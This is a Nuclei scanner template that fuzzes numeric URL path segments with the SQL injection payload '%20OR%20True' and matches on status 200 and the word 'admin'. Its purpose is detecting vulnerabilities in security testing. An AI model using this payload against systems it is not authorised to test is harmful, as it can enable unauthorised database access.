1
id: path-based-sqli
2

3
info:
4
  name: Path Based SQLi
5
  author: pdteam
6
  severity: info
7
  description: |
8
    This template attempts to find SQL injection vulnerabilities on path based sqli and replacing numerical values with fuzzing payloads.
9
    ex: /admin/user/55/profile , /user/15/action/update, /posts/15, /blog/100/data, /page/51/ etc these types of paths are filtered and
10
    replaced with sqli path payloads.
11
    Note: this is example template, and payloads/matchers need to be modified appropriately.
12

13
http:
14
  - pre-condition:
15
      - type: dsl
16
        dsl:
17
          - 'method == "GET"'
18
        condition: and
19
    
20
    payloads:
21
      pathsqli:
22
        - '%20OR%20True'
23
    
24
    fuzzing:
25
      - part: path
26
        type: postfix
27
        mode: single
28
        fuzz:
29
          - '{{pathsqli}}'
30

31
    matchers:
32
      - type: status
33
        status: 
34
          - 200   
35

36
      - type: word
37
        words:
38
          - "admin"   
39
    matchers-condition: and
40